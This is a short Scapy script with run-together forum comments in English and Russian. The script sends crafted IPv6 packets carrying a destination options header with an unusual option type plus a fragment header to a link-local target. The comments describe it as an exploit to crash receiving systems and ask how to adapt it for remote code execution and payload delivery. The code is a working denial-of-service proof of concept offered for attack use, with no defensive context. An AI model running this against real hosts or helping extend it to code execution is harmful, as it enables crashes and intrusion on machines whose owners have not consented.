from scapy.all import *
IPAddr = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)
send packets with hop-by-hop and destination options headersWhat should I send in the packages???
Я имею ввиду этот сплоит для Ddos или как его под RCE приспособить и полезную нагрузку отправить тудаsend packets with hop-by-hop and destination options headers
also use options header to discard the packet and notify to achieve the crash
its for Crash and dos system that receive the packetsI mean this exploit for Ddos or how to adapt it for RCE and send the payload there